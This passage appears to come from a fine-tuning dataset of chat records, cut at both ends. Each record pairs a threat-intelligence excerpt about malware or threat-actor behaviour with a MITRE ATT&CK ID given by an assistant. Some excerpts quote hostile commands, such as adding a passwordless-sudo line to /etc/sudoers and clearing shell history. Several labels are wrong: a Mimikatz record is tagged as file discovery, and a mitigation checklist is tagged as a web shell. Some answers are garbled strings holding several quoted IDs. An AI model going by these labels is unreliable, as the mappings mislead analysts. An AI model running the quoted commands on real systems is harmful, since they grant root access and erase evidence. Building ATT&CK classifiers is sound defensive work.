procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To make detection and analysis harder, QakBot encrypts its strings and decrypts them at runtime before use. Once the QakBot execution logic is finished using a string, it will immediately delete the string from memory. An example of this can be seen in Figure 6 below, which shows QakBot decrypting a string containing the value for lpProcName passed as a parameter to the GetProcAddress API call. The selected function, which has been labeled in IDA Pro as, “oc_clear_mem” deletes the string memory right after it retrieves the process address" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volgmer deobfuscates its strings and APIs once its executed." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on Windows systems" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Elise executes \"systeminfo\" after initial communication is made to the remote server." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Egregor has disabled Windows Defender to evade protections." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flagpro can communicate with its C2 using HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During CostaRicto, the threat actors employed nmap and pscan to scan target environments." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One of the custom tools used by the Leafminer group is a rebranded version of the widespread post-exploitation tool Mimikatz" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail, the adversaries identify other externally accessible servers and deploy ChinaChopper web shells" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dark Caracal's version of Bandook communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string “&&&”." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zeus Panda modifies several Registry keys under \"HKCU\\Software\\Microsoft\\Internet Explorer\\ PhishingFilter\\\" to disable phishing filters." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used SMTP as a communication channel in various implants, initially using self-registered Google Mail accounts and later compromised email servers of its victims. Later implants such as use a blend of HTTP and other legitimate channels, depending on module configuration." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has cleared command history with \"history -c\"." }, { "role": "assistant", "content": "T1070.003 - Indicator Removal on Host: Clear Command History" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bandook has used the ShellExecuteW() function call." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After all of the data is gathered, the malware starts communication with the C&C server by periodically sending HTTP POST requests to the following URL on the received domain" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AADInternals can check for the existence of user email addresses using public Microsoft APIs." }, { "role": "assistant", "content": "T1589.002 - Email Addresses" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attackers manually send a command to the JS or C# component to drop and execute a batch file from one of their servers. That batch file writes a malicious INF file and supplies it as a parameter to the Microsoft utility cmstp.exe, which executes a remote scriptlet specified in the INF file. This technique has been documented in the MITRE ATT&CK knowledge base as CMSTP; an example of how this technique is used may be found here. This technique has been used in the past by Cobalt, another financially motivated group. The remote scriptlet contains obfuscated JS code that drops an OCX file and executes it via regsvr32.exe" }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ferocious Kitten has obtained open source tools for its operations, including JsonCPP and Psiphon." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DownPaper uses PowerShell for execution." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Typical web servers and applications only require GET, POST, and HEAD.Where possible, minimize server fingerprinting by configuring web servers to avoid responding with banners identifying the server software and version number.Secure both the operating system and the application.Update and patch production servers regularly.Disable potentially harmful SQL-stored procedure calls.Sanitize and validate input to ensure that it is properly typed and does not contain escaped code.Consider using type-safe stored procedures and prepared statements.Audit transaction logs regularly for suspicious activity.Perform penetration testing on web services.Ensure error messages are generic and do not expose too much information.Permissions, Privileges, and Access ControlsSystem operators should take the following steps to limit permissions, privileges, and access controls.Reduce privileges to only those needed for a user’s duties.Restrict users’ ability (permissions) to install and run unwanted software applications, and apply the principle of “Least Privilege” to all systems and services" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Transparent Tribe has set up websites with malicious hyperlinks and iframes to infect targeted victims with Crimson, njRAT, and other malicious tools." }, { "role": "assistant", "content": "T1608.004 - Drive-by Target" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 has signed Carbanak payloads with legally purchased code signing certificates. FIN7 has also digitally signed their phishing documents, backdoors and other staging tools to bypass security controls." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used web shells, often to maintain access to a victim network." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OutSteel can download files from its C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SMOKEDHAM can capture screenshots of the victim’s desktop." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM used a modified version of HTRAN in which they obfuscated strings such as debug messages in an apparent attempt to evade detection." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lateral Movement APT40 uses many methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP)" }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RunningRAT contains code to delete files from the victim’s machine." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains a .NET wrapper DLL for creating and managing scheduled tasks for maintaining persistence upon reboot." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XCSSET prompts the user to input credentials using a native macOS dialog box leveraging the system process \"/Applications/Safari.app/Contents/MacOS/SafariForWebKitDevelopment\"." }, { "role": "assistant", "content": "T1056.002 - Input Capture: GUI Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ryuk does not encrypt files from within its own process memory space, but injects into a remote process. Before injecting into a remote process, Ryuk attempts to adjust its token privileges to have the SeDebugPrivilege. Before injecting into a remote process, Ryuk also calls CreateToolhelp32Snapshot to enumerate all running processes. If a process is found that is not named csrss.exe, explorer.exe, lsaas.exe, or is running under NT AUTHORITY system account, Ryuk will inject itself into this single process. By ensuring that the process is not running under NT AUTHORITY, the developers are assuming the process is not running under another account and therefore can be written to. Ryuk uses a combination of VirtualAlloc, WriteProcessMemory and CreateRemoteThread to inject itself into the remote process" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can obtain information about the victim's IP address." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "leverages cmd.exe to perform discovery techniques." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The C2 server address is not embedded directly inside Tomiris: instead, it connects to a signalization server that provides the URL and port to which the backdoor should connect. Then Tomiris sends GET requests to that URL until the C2 server responds with a JSON object of the following structure" }, { "role": "assistant", "content": "T1568 - Dynamic Resolution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GRIFFON has used a persistence module that stores the implant inside the Registry, which executes at logon." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Part of 's operation involved using modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic." }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aquatic Panda has attempted and failed to run Bash commands on a Windows host by passing them to \"cmd /C\"." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another malware sample XORs C2 traffic. malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, evading SSL man-in-the-middle decryption attacks." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DanBot can delete its configuration file after installation." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The PipeMon installer has modified the Registry key \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Print Processors\" to install PipeMon as a Print Processor." }, { "role": "assistant", "content": "T1547.012 - Boot or Logon Autostart Execution: Print Processors" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This second request (Encoded Get System Information Request) is encoded using the same method as the custom TCP protocol used for communication with command-and-control servers, which uses a four-byte XOR encoding. Before acting on the request, Winnti will validate the third DWORD contains the magic value 0xABC18CBA before executing tasking" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography', 'T1205 - Traffic Signaling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete renamed payloads to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python executables." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RedLeaves can obtain information about network parameters." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can steal access tokens from exiting processes." }, { "role": "assistant", "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 3 Targeted lure content In one of the documents, the victim is presented with what appears to be an obfuscated document with the NATO EOD seal and text alluding to the targeted nation state" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has used malicious links to direct users to web pages designed to harvest credentials." }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SideTwist can collect the computer name of a targeted system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleJeus has collected the victim host information after infection." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has collected credentials for the target organization from previous breaches for use in brute force attacks." }, { "role": "assistant", "content": "T1589.001 - Credentials" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IronNetInjector has the ability to decrypt embedded .NET and PE payloads." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the API call ShellExecuteW for execution." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay has base64-encoded its portable executable and hidden itself under a JPG header. Ramsay can also embed information within document footers." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot has used `regsvr32` to execute scripts." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN8 has used dsquery and other Active Directory utilities to enumerate hosts; they have also used \"nltest.exe /dclist\" to retrieve a list of domain controllers." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Peppy can identify specific files for exfiltration." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KeyBoy uses PowerShell commands to download and execute payloads." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In one case, the attackers sent a malicious document which was nearly identical to a legitimate attachment which we observed later being sent to the same recipient" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can delete services from the victim’s machine." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Gorgon Group Crew Breakdown Finding accessible directories, in combination with their other operational security failures, made it easy to start connecting the dots on Gorgon Group members. 360 and Tuisec already identified some Gorgon Group members. In addition to Subaat, we counted an additional four actors performing attacks as part of Gorgon Group. While it’s not known if the attackers physically reside in Pakistan, all members of Gorgon Group purport to be in Pakistan based on their online personas. fudpages One member of Gorgon Group- we're calling ‘fudpages’, was found during this campaign activity based on their utilization of shared infrastructure. One specific Microsoft document drew our attention. 446e1c80102c8b9662d66d44525cb9f519369061b02446e0d4cd30cd26d79a25) This Microsoft Word document was sent via email to several industries across the US and Switzerland. We noticed that this document pulls down additional malware from a C2 also being used in attacks by other Gorgon Group members. Additionally, this document communicates to a relatively new piece of C2 infrastructure- umarguzardijye[.]com, which is hosted on 91[.]234[.]99[.]206" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. However, our analysis confirmed that Bad Rabbit uses the EternalRomance exploit as an infection vector to spread within corporate networks" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bundlore can persist via a LaunchDaemon." }, { "role": "assistant", "content": "T1543.004 - Create or Modify System Process: Launch Daemon" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Whitefly has obtained and used tools such as Mimikatz." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "13 14 ams_api64.dll ams_api32.dll Handy wrapper around API of exXX.dll, pdXX.dll, sgXX.dll" }, { "role": "assistant", "content": "T1055 - Process Injection', 'T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Host enumeration and lateral movement After gaining an initial foothold in a compromised environment, the threat actors quickly identify and explore accessible systems" }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "shareDll, mshareDll, tshareDll Modules used to propagate Trickbot loader to connected network shares of the victimized machine. Modules used to propagate Trickbot loader to connected network shares of the victimized machine. wormwinDll, wormDll, mwormDll, nwormDll Modules used for spreading inside a local network of compromised machines via SMB. Modules used for spreading inside a local network of compromised machines via SMB. tabDll Module used to spread into the network using the EternalRomance exploit. Module used to spread into the network using the EternalRomance exploit" }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bonadan can create bind and reverse shells on the infected system." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dok adds \"admin ALL=(ALL) NOPASSWD: ALL\" to the \"/etc/sudoers\" file." }, { "role": "assistant", "content": "T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware beacons to this directory using the hardcoded API token and attempts to download these files (which are deleted from the Dropbox account after the download): upload.bat, a batch script that the compromised machine will execute upload.rar, a RAR archive that contains at least two files: a batch script to execute, and often an executable (sometimes named rar.exe)  which the batch script will run and almost always uploads the results of download.rar to the cloud storage account silent.txt and period.txt,  small files sizes of 0-4 bytes that dictate the frequency to check in with the CnC The threat actor will then download the results and then delete the files from the cloud storage account" }, { "role": "assistant", "content": "T1064 - Scripting', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak can execute tasks via OLE." }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zebrocy creates an entry in a Registry Run key for the malware to execute on startup." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Forensic examination of a computer infected with a banking trojan Oleg Skulkin Senior Digital Forensics Analyst at Group-IB Where did it all start. Since then, phishing emails distributing the trojan have been sent to potential victims with admirable persistence. In this article, I am going to show how to perform forensic analysis of an image of a computer infected with the RTM banking trojan. Let's try to find registry files, such as SOFTWARE, for example. Let's recall Jesse Kornblum's paradox: \"Malware can hide, but it must run\". A good start will be to look for potential persistence mechanisms that can be used by the malware to restart after reboot. Let's start with simple things: we will take the NTUSER.DAT registry file with the latest modification date from the user directory (C:\\Users\\%username%\\), and extract data from it using RegRipper. Let's start with low-hanging fruits, the so-called run keys: The partition was last modified on November 7th, and we see that when a user logs in, the apg.exe file is executed from a very suspicious location. Let's see what else we can find in the b7mg81 directory: TeamViewer. Let's take a closer look at apg.exe and use PPEE: This looks like TeamViewer and is signed as TeamViewer, so does this mean it indeed is TeamViewer. Another interesting file is TeamViewer.ini: Here is anti-forensics: according to the configuration file, our \"TeamViewer\" did not keep any logs, and was apparently used as a RAT (Remote Access Trojan). Well, not bad" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Astaroth collects the external IP address from the system." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a function for decrypting data containing C2 configuration information." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Filter the target machines: setup.bat first checks if the hostname of the machine is one of the following: PIS-APP, PIS-MOB, WSUSPROXY or PIS-DB. If so, it stops the execution and deletes the folder containing the malicious script from this machine. Download the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Unleash the main payload: The msrun.bat script is responsible for unleashing the Wiper. It moves wiper-related files to “C:\\temp” and creates a scheduled task named mstask to execute the wiper only once at 23:55:00" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OopsIE concatenates then decompresses multiple resources to load an embedded .Net Framework assembly." }, { "role": "assistant", "content": "T1140 - 